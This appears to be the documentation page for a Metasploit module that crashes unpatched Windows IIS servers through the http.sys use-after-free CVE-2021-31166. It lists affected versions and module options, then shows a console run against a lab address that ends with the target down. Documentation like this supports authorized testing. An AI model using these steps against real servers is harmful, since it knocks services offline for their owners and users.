IIS web server on Windows 10 and Windows Server version 20H2 and 2004 without KB5003173.
This module exploits CVE-2021-31166, a UAF bug in http.sys that was patched by Microsoft in May 2021, to cause a BSOD and crash the target IIS server.
- Required
- Type: address
- No default value
IP address or hostname of the target IIS server.
- Required
- Type: integer
- Default value: 80
The port on the target server where IIS is running.
- Optional
- Type: string
- Default value: /
The base URL of the IIS install on the target server.
msf6 > use exploit/windows/iis/rb_dos_iis_2021_31166
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > show options
Module options (auxiliary/windows/iis/rb_dos_iis_2021_31166):
Name Current Setting Required Description
---- --------------- -------- -----------
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes The URI of the IIS Server.
VHOST no HTTP server virtual host
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > set RHOST 192.168.56.9
RHOST => 192.168.56.9
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) > exploit
[*] Running module against 192.168.56.9
[*] Connecting to target to make sure its alive...
[+] Successfully connected to target. Sending payload...
[+] Payload was sent to the target server. Checking that the server is down...
[+] Target is down.
[*] Auxiliary module execution completed
msf6 auxiliary(windows/iis/rb_dos_iis_2021_31166) >
